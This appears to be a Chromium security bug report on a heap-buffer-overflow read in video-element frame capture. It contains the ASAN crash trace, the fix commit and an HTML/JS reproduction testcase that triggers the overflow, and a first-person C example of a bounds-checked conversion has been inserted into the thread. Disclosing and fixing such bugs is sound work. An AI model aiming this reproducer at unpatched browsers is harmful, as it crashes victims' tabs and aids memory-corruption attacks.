
Issue 762110

Issue metadata

Status: WontFix
Owner:
Closed: Sep 2017
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Linux
Pri: 1
Type: Bug-Security

Security: heap-buffer-overflow READ in content::HtmlVideoElementCapturerSource::sendNewFrame

Reported by cloudfuz...@gmail.com, Sep 5 2017

Issue description

VULNERABILITY DETAILS
The testcase crashes the latest ASAN build of content_shell as follows:

=================================================================
==23233==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000775b4 at pc 0x560e858ada85 bp 0x7fffb4cc6cd0 sp 0x7fffb4cc6480
READ of size 8 at 0x6020000775b4 thread T0 (chrome)
    #0 0x560e858ada84 in __asan_memcpy (/home/nils/fuzzer3/asan-linux-release-499408/chrome+0x3214a84)
    #1 0x560e8f293f37 in ARGBToUVRow_Any_AVX2 third_party/libyuv/source/row_any.cc:964:1
    #2 0x560e8f27cb21 in ARGBToI420 third_party/libyuv/source/convert.cc:616:5
    #3 0x560e9854ec40 in ConvertToI420 third_party/libyuv/source/convert_to_i420.cc:129:11
    #4 0x560e9687575d in content::HtmlVideoElementCapturerSource::sendNewFrame() content/renderer/media_capture_from_element/html_video_element_capturer_source.cc:154:7
    #5 0x560e8c3cf030 in Run base/callback.h:64:12
    #6 0x560e8c3cf030 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:65
    #7 0x560e8b274cdd in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue(blink::scheduler::internal::WorkQueue*, bool, blink::scheduler::LazyNow, base::TimeTicks*) third_party/WebKit/Source/platform/scheduler/base/task_queue_manager.cc:515:19
    #8 0x560e8b26e9ad in blink::scheduler::TaskQueueManager::DoWork(bool) third_party/WebKit/Source/platform/scheduler/base/task_queue_manager.cc:312:13
    #9 0x560e8c3cf030 in Run base/callback.h:64:12
    #10 0x560e8c3cf030 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:65
    #11 0x560e8c4419b2 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:406:25
    #12 0x560e8c443718 in DeferOrRunPendingTask base/message_loop/message_loop.cc:417:5
    #13 0x560e8c443718 in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:524
    #14 0x560e8c448d0f in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:33:31
    #15 0x560e8c4cc929 in base::RunLoop::Run() base/run_loop.cc:123:14
    #16 0x560e966f136e in content::RendererMain(content::MainFunctionParams const&) content/renderer/renderer_main.cc:220:23
    #17 0x560e8b703990 in content::RunZygote(content::MainFunctionParams const&, content::ContentMainDelegate*) content/app/content_main_runner.cc:354:14
    #18 0x560e8b7077fa in content::ContentMainRunnerImpl::Run() content/app/content_main_runner.cc:709:12
    #19 0x560e8b72a08a in service_manager::Main(service_manager::MainParams const&) services/service_manager/embedder/main.cc:469:29
    #20 0x560e8b703044 in content::ContentMain(content::ContentMainParams const&) content/app/content_main.cc:19:10
    #21 0x560e858da497 in ChromeMain chrome/app/chrome_main.cc:122:12
    #22 0x7f44c710b82f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291

0x6020000775b4 is located 0 bytes to the right of 4-byte region [0x6020000775b0,0x6020000775b4)
allocated by thread T0 (chrome) here:
    #0 0x560e858ae853 in __interceptor_malloc (/home/nils/fuzzer3/asan-linux-release-499408/chrome+0x3215853)
    #1 0x560e8c4b5060 in base::UncheckedMalloc(unsigned long, void**) base/process/memory_linux.cc:104:13
    #2 0x560e8c711f1b in sk_malloc_nothrow skia/ext/SkMemory_new_handler.cpp:75:19
    #3 0x560e8c711f1b in sk_malloc_flags(unsigned long, unsigned int) skia/ext/SkMemory_new_handler.cpp:87
    #4 0x560e8c7e2e15 in operator() third_party/skia/src/core/SkMallocPixelRef.cpp:79:55
    #5 0x560e8c7e2e15 in __invoke third_party/skia/src/core/SkMallocPixelRef.cpp:79
    #6 0x560e8c7e2e15 in MakeUsing third_party/skia/src/core/SkMallocPixelRef.cpp:68
    #7 0x560e8c7e2e15 in SkMallocPixelRef::MakeAllocate(SkImageInfo const&, unsigned long) third_party/skia/src/core/SkMallocPixelRef.cpp:80
    #8 0x560e8c71cfcb in SkBitmap::tryAllocPixels(SkImageInfo const&, unsigned long) third_party/skia/src/core/SkBitmap.cpp:251:28
    #9 0x560e9687485f in tryAllocPixels third_party/skia/include/core/SkBitmap.h:269:22
    #10 0x560e9687485f in content::HtmlVideoElementCapturerSource::StartCapture(media::VideoCaptureParams const&, base::RepeatingCallback<void (scoped_refptr<media::VideoFrame> const&, base::TimeTicks)> const&, base::RepeatingCallback<void (bool)> const&) content/renderer/media_capture_from_element/html_video_element_capturer_source.cc:88
    #11 0x560e967b201c in content::MediaStreamVideoCapturerSource::StartSourceImpl(base::RepeatingCallback<void (scoped_refptr<media::VideoFrame> const&, base::TimeTicks)> const&) content/renderer/media/media_stream_video_capturer_source.cc:208:12
    #12 0x560e967b50cc in content::MediaStreamVideoSource::AddTrack(content::MediaStreamVideoTrack*, content::VideoTrackAdapterSettings const&, base::RepeatingCallback<void (scoped_refptr<media::VideoFrame> const&, base::TimeTicks)> const&, base::RepeatingCallback<void (content::MediaStreamSource*, content::MediaStreamRequestResult, blink::WebString const&)> const&) content/renderer/media/media_stream_video_source.cc:64:7
    #13 0x560e967bc0ef in content::MediaStreamVideoTrack::MediaStreamVideoTrack(content::MediaStreamVideoSource*, base::RepeatingCallback<void (content::MediaStreamSource*, content::MediaStreamRequestResult, blink::WebString const&)> const&, bool) content/renderer/media/media_stream_video_track.cc:253:11
    #14 0x560e967bb732 in content::MediaStreamVideoTrack::CreateVideoTrack(content::MediaStreamVideoSource*, base::RepeatingCallback<void (content::MediaStreamSource*, content::MediaStreamRequestResult, blink::WebString const&)> const&, bool) content/renderer/media/media_stream_video_track.cc:210:26
    #15 0x560e9653cf20 in content::AddVideoTrackToMediaStream(std::__1::unique_ptr<media::VideoCapturerSource, std::__1::default_delete<media::VideoCapturerSource> >, bool, blink::WebMediaStream*) content/public/renderer/media_stream_utils.cc:46:30
    #16 0x560e966e17b7 in content::RendererBlinkPlatformImpl::CreateHTMLVideoElementCapturer(blink::WebMediaStream*, blink::WebMediaPlayer*) content/renderer/renderer_blink_platform_impl.cc:931:3
    #17 0x560e9c578d68 in blink::(anonymous namespace)::MediaElementEventListener::handleEvent(blink::ExecutionContext*, blink::Event*) third_party/WebKit/Source/modules/mediacapturefromelement/HTMLMediaElementCapture.cpp:72:26
    #18 0x560e94961b1c in blink::EventTarget::FireEventListeners(blink::Event*, blink::EventTargetData*, blink::HeapVector<blink::RegisteredEventListener, 1ul>&) third_party/WebKit/Source/core/dom/events/EventTarget.cpp:760:15
    #19 0x560e9495f764 in blink::EventTarget::FireEventListeners(blink::Event*) third_party/WebKit/Source/core/dom/events/EventTarget.cpp:621:29
    #20 0x560e9ad8d253 in blink::Node::HandleLocalEvents(blink::Event&) third_party/WebKit/Source/core/dom/Node.cpp:2177:3
    #21 0x560e94c9501b in blink::NodeEventContext::HandleLocalEvents(blink::Event&) const third_party/WebKit/Source/core/events/NodeEventContext.cpp:63:10
    #22 0x560e9493bddc in DispatchEventAtTarget third_party/WebKit/Source/core/dom/events/EventDispatcher.cpp:236:29
    #23 0x560e9493bddc in blink::EventDispatcher::Dispatch() third_party/WebKit/Source/core/dom/events/EventDispatcher.cpp:182
    #24 0x560e94939695 in blink::EventDispatcher::DispatchEvent(blink::Node&, blink::EventDispatchMediator*) third_party/WebKit/Source/core/dom/events/EventDispatcher.cpp:59:20
    #25 0x560e9d4fdead in blink::MediaElementEventQueue::TimerFired(blink::TimerBase*) third_party/WebKit/Source/core/dom/events/MediaElementEventQueue.cpp:108:13
    #26 0x560e9453020e in blink::TimerBase::RunInternal() third_party/WebKit/Source/platform/Timer.cpp:174:3
    #27 0x560e8c3cf030 in Run base/callback.h:64:12
    #28 0x560e8c3cf030 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:65
    #29 0x560e8b274cdd in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue(blink::scheduler::internal::WorkQueue*, bool, blink::scheduler::LazyNow, base::TimeTicks*) third_party/WebKit/Source/platform/scheduler/base/task_queue_manager.cc:515:19
    #30 0x560e8b26e9ad in blink::scheduler::TaskQueueManager::DoWork(bool) third_party/WebKit/Source/platform/scheduler/base/task_queue_manager.cc:312:13
    #31 0x560e8c3cf030 in Run base/callback.h:64:12
    #32 0x560e8c3cf030 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:65
    #33 0x560e8c4419b2 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:406:25
    #34 0x560e8c443718 in DeferOrRunPendingTask base/message_loop/message_loop.cc:417:5
    #35 0x560e8c443718 in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:524
    #36 0x560e8c448d0f in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:33:31
    #37 0x560e8c4cc929 in base::RunLoop::Run() base/run_loop.cc:123:14
    #38 0x560e966f136e in content::RendererMain(content::MainFunctionParams const&) content/renderer/renderer_main.cc:220:23

SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/nils/fuzzer3/asan-linux-release-499408/chrome+0x3214a84) in __asan_memcpy
Shadow bytes around the buggy address:
==23233==ABORTING

VERSION
Chrome Version: asan-linux-release-499408
Operating System: Linux

REPRODUCTION CASE

<script>
function start() {
	// Create a <video> element and start capturing its frames with captureStream()
	// before any source has been assigned.
	try{o78=document.createElementNS('http://www.w3.org/1999/xhtml','video')}catch(e){};
	try{o78['captureStream'](14)}catch(e){};
	// Only now is the inline WebM source set; the capturer was started on the
	// small bitmap allocated in StartCapture (see the 4-byte allocation above).
	o78.setAttribute('src',"data:video/webm;base64,GkXfowEAAAAAAAAfQoaBAUL3gQFC8oEEQvOBCEKChHdlYm1Ch4ECQoWBAhhTgGcBAAAAAAACfhFNm3RALE27i1OrhBVJqWZTrIHfTbuMU6uEFlSua1OsggEwTbuMU6uEHFO7a1OsggJh7AEAAAAAAACkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVSalmAQAAAAAAAEUq17GDD0JATYCNTGF2ZjU2LjQwLjEwMVdBjUxhdmY1Ni40MC4xMDFzpJAI9vs3HzFdyEBxXtVbMzM0RImIQJdwAAAAAAAWVK5rAQAAAAAAADuuAQAAAAAAADLXgQFzxYEBnIEAIrWcg3VuZIaFVl9WUDmDgQEj44OEDuaygOABAAAAAAAABrCBAbqBAR9DtnUBAAAAAAAA3ueBAKOmgQAAgKJJg0IAAAAAAMAHBIODCoAABAAAEb//+UIU3iZw//Z8AACjxIEA+gCkAIBJegCGwAAGIAAAALn///wyA/////7OSv///y4AAKYAQJacAExAAAMgAAAc//+AD////+bR///nIADBIBzBo5uBAfQApgBAlpwATcAAAyAAAAD8//4WX/5f8KCjoIEC7gCmAECWnABNgAADIAAAALn+eD///98F////TgAAo5OBA+gApgEAlpwATWAAAyAAAF5Yo5eBBOIApgBBDpwATSAAAyAAADTN/8gAABxTu2sBAAAAAAAAEbuPs4EAt4r3gQHxggF38IED");
}
</script>
<body onload="start()"></body>

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Comment 1 by ClusterFuzz, Sep 5 2017

ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://clusterfuzz.com/testcase?key=5006920141504512.

Comment 2 by ClusterFuzz, Sep 6 2017

Labels: Security_Severity-Medium
Detailed report: https://clusterfuzz.com/testcase?key=5006920141504512

Job Type: linux_asan_chrome_mp
Crash Type: Heap-buffer-overflow READ 8
Crash Address: 0x6090001ddce4
Crash State:
  ARGBToUVRow_Any_SSSE3
  ARGBToI420
  ConvertToI420
Sanitizer: address (ASAN)

Recommended Security Severity: Medium

Regressed: https://clusterfuzz.com/revisions?job=linux_asan_chrome_mp&range=490547:490630

Reproducer Testcase: https://clusterfuzz.com/download?testcase_id=5006920141504512

See https://github.com/google/clusterfuzz-tools for more information.

A recommended severity was added to this bug. Please change the severity if it is inaccurate.

Comment 3 by sheriffbot@chromium.org, Sep 6 2017

Labels: Pri-1
Cc: fbarchard@chromium.org
Components: Blink>MediaStream>CaptureFromElement
Owner: mcasas@chromium.org
Status: Assigned (was: Unconfirmed)
Summary: Security: heap-buffer-overflow READ in content::HtmlVideoElementCapturerSource::sendNewFrame (was: Security: heap-buffer-overflow in content::HtmlVideoElementCapturerSource::sendNewFrame)
mcasas -- Can you take a look? The test case uses captureStream, and your CL enabling it (https://chromium-review.googlesource.com/c/chromium/src/+/544899)
is in the regression range. The bug may also be in /third_party/libyuv.
Cc: chfremer@chromium.org mcasas@chromium.org
Labels: OS-Linux
Owner: niklase@chromium.org
Status: Untriaged (was: Assigned)
nparker@ I won't have time for this any time soon, assigning to niklase@ for triaging and adding chfremer@ FYI.

Comment 6 by sheriffbot@chromium.org, Sep 7 2017

Status: Assigned (was: Untriaged)
Cc: niklase@chromium.org
Owner: emir...@chromium.org

Comment 8 by ClusterFuzz, Sep 12 2017

Status: WontFix (was: Assigned)
ClusterFuzz testcase 5006920141504512 is flaky and no longer crashes, so closing issue.

If this is incorrect, please add ClusterFuzz-Wrong label and re-open the issue.

Comment 9 by bugdroid1@chromium.org, Sep 12 2017

The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/73f0459407c140d354ca3fc980ae17da286b0087

commit 73f0459407c140d354ca3fc980ae17da286b0087
Author: Emircan Uysaler <emircan@chromium.org>
Date: Tue Sep 12 15:18:33 2017

Fix sizes used for conversion in HTMLVideoElementCapturerSource

Bug: 730365, 762110
Change-Id: I6a7c090385bc595171b82f73ba53635b1623b210
Reviewed-on: https://chromium-review.googlesource.com/634463
Reviewed-by: Miguel Casas <mcasas@chromium.org>
Commit-Queue: Miguel Casas <mcasas@chromium.org>
Cr-Commit-Position: refs/heads/master@{#501280}
[modify] https://crrev.com/73f0459407c140d354ca3fc980ae17da286b0087/content/renderer/media_capture_from_element/html_video_element_capturer_source.cc
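
The fix above corrects the sizes handed to the converter; the ASAN report shows the failure mode it closes, a 4-byte SkBitmap allocated in StartCapture being read by ARGBToI420 as a larger frame. As an added illustration (not Chromium or libyuv code), here is a bounds-checked ARGB-to-I420 conversion that refuses a source buffer smaller than the claimed geometry requires instead of reading past it. The function names, the overflow-guarded size computation and the BT.601 coefficients are my own choices.

```c
#include <stddef.h>
#include <stdint.h>

/* Bytes an ARGB frame of the claimed geometry must occupy, or 0 when the
 * geometry is invalid or stride * height would overflow size_t. */
size_t argb_required_bytes(int width, int height, size_t stride) {
    if (width <= 0 || height <= 0) return 0;
    if (stride < (size_t)width * 4) return 0;          /* stride must cover a row */
    if (stride > SIZE_MAX / (size_t)height) return 0;  /* overflow guard */
    return stride * (size_t)height;
}

/* Bounds-checked ARGB (bytes B,G,R,A) -> I420 (BT.601 limited range), a stand-in
 * for the libyuv call in the report. dst_y holds width*height bytes, dst_u and
 * dst_v ((width+1)/2)*((height+1)/2) each. Returns 0 on success and -1 when
 * src_len cannot hold the claimed frame, instead of reading past the buffer. */
int argb_to_i420_checked(const uint8_t *src, size_t src_len, size_t stride,
                         int width, int height,
                         uint8_t *dst_y, uint8_t *dst_u, uint8_t *dst_v) {
    size_t need = argb_required_bytes(width, height, stride);
    if (need == 0 || need > src_len) return -1;
    int cw = (width + 1) / 2;                 /* chroma plane width */
    for (int y = 0; y < height; y += 2) {
        for (int x = 0; x < width; x += 2) {
            int su = 0, sv = 0, n = 0;        /* average chroma over the 2x2 block */
            for (int dy = 0; dy < 2 && y + dy < height; dy++) {
                for (int dx = 0; dx < 2 && x + dx < width; dx++) {
                    const uint8_t *p = src + (size_t)(y + dy) * stride + (size_t)(x + dx) * 4;
                    int b = p[0], g = p[1], r = p[2];
                    dst_y[(y + dy) * width + (x + dx)] =
                        (uint8_t)(((66 * r + 129 * g + 25 * b + 128) >> 8) + 16);
                    su += (112 * b - 38 * r - 74 * g + 32896) >> 8;  /* 128 rounding + 128<<8 bias */
                    sv += (112 * r - 94 * g - 18 * b + 32896) >> 8;
                    n++;
                }
            }
            dst_u[(y / 2) * cw + x / 2] = (uint8_t)(su / n);
            dst_v[(y / 2) * cw + x / 2] = (uint8_t)(sv / n);
        }
    }
    return 0;
}

/* Constructed sample mirroring the report: a 4-byte (1x1) bitmap like the one
 * allocated in StartCapture, handed to the converter as if it were 2x2. */
static const uint8_t kOnePixel[4] = {255, 255, 255, 255};

int demo_mismatch_is_rejected(void) {
    uint8_t y[4], u[1], v[1];
    return argb_to_i420_checked(kOnePixel, sizeof kOnePixel, 8, 2, 2, y, u, v);
}
```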

Comment 10 by sheriffbot@chromium.org, Dec 19 2017

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
